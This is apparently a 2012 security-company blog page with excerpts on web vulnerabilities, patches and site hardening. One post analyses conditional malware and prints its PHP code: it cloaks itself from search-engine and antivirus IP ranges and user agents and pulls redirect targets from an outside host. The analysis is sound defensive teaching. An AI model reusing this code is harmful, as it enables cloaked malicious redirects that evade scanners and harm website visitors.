Microsoft XML Core Service Zero Day Vulnerability Being Targeted

On June 12th we reported the release of a new Microsoft Security Advisory. It was of specific interest to us as it was exploitable via web-based malware and being classified as a Zero Day vulnerability.

To that point, today, NakedSecurity reported that the Blackhole Exploit Kit has been updated with a module designed to exploit that vulnerability.

Blackhole Exploit Kit


Read More

WordPress Update – 3.3.3 and 3.4.1 Patches Released!!

Well it was only a few weeks ago, but today, two new patches were released: 3.3.3 and 3.4.1.

The good news is, as they are patches, the updates should be fairly straight forward and should not cause much, if any, issues. It is important to note though that this is a Maintenance and Security release. On their official post they highlight the following items:

  • Fixes an issue where a theme’s page templates were sometimes not detected.
  • Addresses problems with some category permalink structures.
  • Better handling for plugins or themes loading JavaScript incorrectly.
  • Adds early support for uploading images on iOS 6 devices.
  • Allows for a technique commonly used by plugins to detect a network-wide activation.
  • Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.


Read More

Uploadify, Uploadify and Uploadify – The New TimThumb?

We are seeing a lot of noise again regarding the Uploadify script vulnerabilities affecting some WordPress themes/plugins. If you are not familiar, Uploadify allows anyone to upload anything they want to your site without any authentication.

Very very useful, no? Maybe, but at what cost? If a bad guy/gal knows that you have the Uploadify script, they can upload anything they want too (backdoors) and hack your site.

First, Uploadify is nothing new. When we were reporting on the TimThumb vulnerabilities, we were also notifying everyone about the issues with uploadify.

Been Around

  1. In October of 2011 we warned everyone to remove and check for Uploadify: Remove Unused/Testing/Debug Software From Your Site
  2. We put out a post in August of 2011 listing themes affected by TimThumb, we also listed the ones Using uploadify as unsafe: Timthumb Security Vulnerability – List of Themes
  3. An oldie but goodie, TimThumb (Tip of the Iceberg), Uploadify was also included

  4. Read More

Plesk Vulnerability Leading to Malware

Our friends over at Unmask Parasites posted two very good reports about a mix of Plesk vulnerabilities being used to mass-compromise websites, and redirecting them to the Blackhole Exploit Kit.

The first issue is that old versions of Plesk store passwords in clear text (yes, clear text in 2012). The second is a remote SQL vulnerability that has been found in old versions of Plesk allowing attackers to exploit those passwords.

clear text password + database dump = Mass password leaks

This has possibly allowed attackers to gain access to a large number of passwords and hosts/sites. We recommend reading those two posts to understand the issue:

Read More

How To: Lock Your Site by Enabling a Second Layer of Authentication

I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication.

That got me thinking about a putting together this post which will help educate our readers on a quick and easy method that can help add a second layer of authentication to their own administrative panels. What’s great about this is it can be applied to any web application that is running on an Apache HTTP Server, those platforms include:

  • WordPress
  • Joomla
  • Drupal
  • osCommerce
  • and more…


Read More

Sucuri Labs Weekly Review – June 22nd – 2012

Have you checked out Sucuri Labs? We have been adding a daily feed of the top web-based malware
samples that we find every day, and the number of compromised sites as well.

We separate the data into three main categories:

  • Hidden iframes
  • Conditional redirections (genereally done via .htaccess)
  • Encoded javascript.

This helps us understand how sites are getting compromised and how it is being executed in the browser.

Read More

Understanding Conditional Malware – IP Centric Variation

In today’s web malware landscape you can’t help but take a minute to familiarize yourself with a concept known as conditional malware.

As implied in the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to time of day. They are very tricky and as you would expect, evolve every day. Often when someone calls or sends us an email asking why we’re not picking something up on our free scanner, SiteCheck, that’s usually the case. As of late, the PHARMA hack is being notorious for the use of conditional type infections making it exceptionally difficult to detect via HTTP.

In this post we’ll take a look at a specific type of conditional malware that is applying specific rules around which IP’s it will not display to. It’s the same string that we wrote about earlier causing us to flag Google.com as malware.. oops..:)

My goal is to keep it high level, not going to get crazy with the code, but I do want to take some time to walk through it so that you can learn to detect similar infections in your environment.

Dissecting The Code


User Agents

The first thing you notice when you see the infection is the use of $user_agent_to_filter. This is telling the code to dispaly if it comes from any one of those user agents:

$user_agent_to_filter = array( ‘#Ask\s*Jeeves#i’, ‘#HP\s*Web\s*PrintSmart#i’, ‘#Safari#i’, ‘#HTTrack#i’, ‘#Chrome#i’, ‘#Mac#i’, ‘#IDBot#i’, ‘#Indy\s*Library#’, ‘#ListChecker#i’, ‘#MSIECrawler#i’, ‘#NetCache#i’, ‘#Nutch#i’, ‘#RPT-HTTPClient#i’, ‘#rulinki\.ru#i’, ‘#Twiceler#i’, ‘#WebAlta#i’, ‘#Webster\s*Pro#i’,’#www\.cys\.ru#i’, ‘#Wysigot#i’, ‘#Yahoo!\s*Slurp#i’, ‘#Yeti#i’, ‘#Accoona#i’, ‘#CazoodleBot#i’, ‘#CFNetwork#i’, ‘#ConveraCrawler#i’,’#DISCo#i’, ‘#Download\s*Master#i’, ‘#FAST\s*MetaWeb\s*Crawler#i’, ‘#Flexum\s*spider#i’, ‘#Gigabot#i’, ‘#HTMLParser#i’, ‘#ia_archiver#i’, ‘#ichiro#i’, ‘#IRLbot#i’, ‘#km\.ru\s*bot#i’, ‘#kmSearchBot#i’, ‘#libwww-perl#i’, ‘#Lupa\.ru#i’, ‘#LWP::Simple#i’, ‘#lwp-trivial#i’, ‘#Missigua#i’, ‘#MJ12bot#i’,
‘#msnbot#i’, ‘#msnbot-media#i’, ‘#Offline\s*Explorer#i’, ‘#OmniExplorer_Bot#i’,
‘#PEAR#i’, ‘#psbot#i’, ‘#Python#i’, ‘#rulinki\.ru#i’, ‘#SMILE#i’,
‘#Speedy#i’, ‘#Teleport\s*Pro#i’, ‘#TurtleScanner#i’, ‘#User-Agent#i’, ‘#voyager#i’,
‘#Webalta#i’, ‘#WebCopier#i’, ‘#WebData#i’, ‘#WebZIP#i’, ‘#Wget#i’,
‘#Yandex#i’, ‘#Yanga#i’, ‘#Yeti#i’, ‘#msnbot#i’, ‘#spider#i’, ‘#yahoo#i’, ‘#jeeves#i’ ,’#google#i’ ,’#altavista#i’,
‘#scooter#i’ ,’#av\s*fetch#i’ ) ;

Filtering IPs

The next you notice is there long array of IP’s. In essence, if you contain an IP that equals their value or even fits within the range a different action will occur. How nice of them to actually comment on those ranges that belong to search engines and AntiVirus providers.

$stop_ips_masks = array(
“66\.249\.[6-9][0-9]\.[0-9]+”, // Google NetRange: 66.249.64.0 – 66.249.95.255
“74\.125\.[0-9]+\.[0-9]+”, // Google NetRange: 74.125.0.0 – 74.125.255.255
“65\.5[2-5]\.[0-9]+\.[0-9]+”, // MSN NetRange: 65.52.0.0 – 65.55.255.255,
“74\.6\.[0-9]+\.[0-9]+”, // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
“67\.195\.[0-9]+\.[0-9]+”, // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
“72\.30\.[0-9]+\.[0-9]+”, // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
“38\.[0-9]+\.[0-9]+\.[0-9]+”, // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
“93\.172\.94\.227″, // MacFinder
“212\.100\.250\.218″, // Wells Search II
“128\.103\.64\.[0-9]+”, // StopBadWare
“150\.70\.[0-9]+\.[0-9]+”, // TrendMicro
“216\.104\.[0-9]+\.[0-9]+”, // TrendMicro
“207\.46\.[0-9]+\.[0-9]+”, // Microsoft
“157\.55\.[0-9]+\.[0-9]+”, // Microsoft
“213\.180\.[0-9]+\.[0-9]+”, // Yandex
“217\.23\.[0-9]+\.[0-9]+”, // Kaspersky
“91\.103\.64\.[0-9]+”, // Kaspersky
“215\.5\.80\.[0-9]+”, // Kaspersky
“195\.168\.53\.[0-9]+”, // NOD32
“220\.255\.1\.[0-9]+”, // domain-tool.com
“69\.28\.58\.[0-9]+”, // Symantec
“66\.147\.244\.[0-9]+”, // freepcsecurity.co.uk
“128\.111\.48\.[0-9]+”, // wepawet.cs.ucsb.edu
“209\.9\.239\.[0-9]+”, // jsunpack.jeek.org
“62\.67\.194\.[0-9]+”, // support.clean-mx.de
“195\.214\.79\.[0-9]+”, // support.clean-mx.de
“97\.74\.141\.[0-9]+”, // malwareurl.com
“213\.171\.194\.[0-9]+”, // spamhaus
“139\.146\.167\.[0-9]+”, // malwaredomains
“88\.160\.229\.[0-9]+”, // malwaredomains
“69\.162\.79\.[0-9]+”, // malwarebytes
“66\.40\.145\.[0-9]+”, // bitdefender
“66\.223\.50\.[0-9]+”, // bitdefender
“204\.14\.90\.[0-9]+”, // spywarewarrior.com
“92\.123\.155\.[0-9]+”, // Sophos
“213\.31\.172\.[0-9]+”, // Sophos
“143\.215\.130\.[0-9]+”, // Malwaredomainlist
“150\.70\.172\.[0-9]+”, // TrendNet
“64\.88\.164\.[0-9]+”, // AVG
“102\.157\.192\.[0-9]+”, // ZeusTracker
“109\.65\.41\.[0-9]+”, // ZeusTracker
“110\.77\.248\.[0-9]+”, // Virustotal
“59\.6\.145\.[0-9]+”, // Virustotal
“67\.124\.37\.[0-9]+”, // Virustotal

The Rule (a.k.a. The Condition)

If Condition is Met, then..

Then once the user agents have been defined and the “bad” IP’s flagged, you then have the condition. In this instance what it is saying is if any of the IP’s fall within those identified above redirect them to http://www.google.com. How annoying is that!!!!

foreach ( $stop_ips_masks as $k=>$v )
{
if ( preg_match( ‘#^’.$v.’$#’, $_SERVER['REMOTE_ADDR']) )
$is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, ‘-NO-WAY-’, $_SERVER['HTTP_USER_AGENT'] ), ‘-NO-WAY-’ ) ) )
{

header(“Location: http://www.google.com/”);
die();

If Condition is Not Met, then…

Now that we know what it does if the condition is met, let’s look at what it does if the condition is not met.

set_time_limit(30);

$cache = dirname(__FILE__) . ‘/link.cache’;

$link = @file_get_contents($cache);

if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
$link = @file_get_contents(‘http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626′);

if (strlen($link) > 20)
{
$fp = @fopen ($cache, ‘w’);
@fputs($fp, $link);
@fclose($fp);
}
}

header (‘Location: ‘ . $link);
exit;

As you can see, if the condition is not met then the incoming request continues down the the yellow brick road and finds at a new domain courtesy of this:

@file_get_contents(‘http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626′);

That little API defines which URL to share with the request. It actually rotates the domains so if you hit it multiple time you’re not likely to get the same one.

What Did We Learn


Hopefully you gained an appreciation for what conditional malware is all about and the challenges with catching it via HTTP crawlers.

This specific instance only talks to one type, there are varying permutations of this floating the interwebs. If you’re a client, we highly recommend enabling the server-side scanner as it’s not restricted to the limitations found with HTTP crawlers.

A couple of tale tell signs that something is wrong is if you start getting comments like this:

  • I am being redirected on my mobile device but not your machine
  • I am being redirected on my Chrome broswer but not in Firefox
  • I remember seeing something a day agao but now its not there

Keep an eye out for questions or comments that resemble any of those points, if you hear them you now know that you’re likely dealing with some type of conditional malware.


If you have any questions pertaining to this post please feel free to email us at info@sucuri.net.

Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

Today Google released a nice post: Safe Browsing – Protecting Web Users for 5 Years and Counting. In it they provide a good summary of what they have been up to the past 5 years with their Safe Browsing program.

Here are some interesting data points:

  • 600 million users are protected
  • 9,500 new malicious websites are found every day
  • 12 – 14 million Google Search queries show malicious warnings
  • Provide warnings to about 300,000 downloads per day
  • Send thousands of notifications daily to webmasters
  • Sent thousands of notifications daily to Internet Service Providers (ISPs)


Read More

How To: Stop The Hacker By Hardening WordPress

Every day we service 100′s of clients and the question is always asked:

How do you stop these hackers!!!”

Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape.

This post will augment our previous post, Ask Sucuri: “How to Stop The Hacker and ensure Your Site Is Locked!!”, but hopefully provide you more tangible take-away’s. It will also leverage guidance recently shared at a conference for WordPress enthusiats – WordCamp Orange County 2012.

The Presentation


Here is the presentation in its entirety. Very appropriately, it’s titled WordPress Security – Knowledge is Power, mainly because of the emphasis we put around empowering the end-user with as many tools as possible to make them more effective at protecting themselves.

Give a man a fish and you feed him for a day. Teach a man to fish and you feed him a lifetime. – Chinese proverb


Read More

Joomla 2.5.5 released (security update)

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

High severity security issue, that allows unprivileged users to get admin access to a site running Joomla.

2- Information Disclosure

This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause for web site compromises is outdated software! So as a web site owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.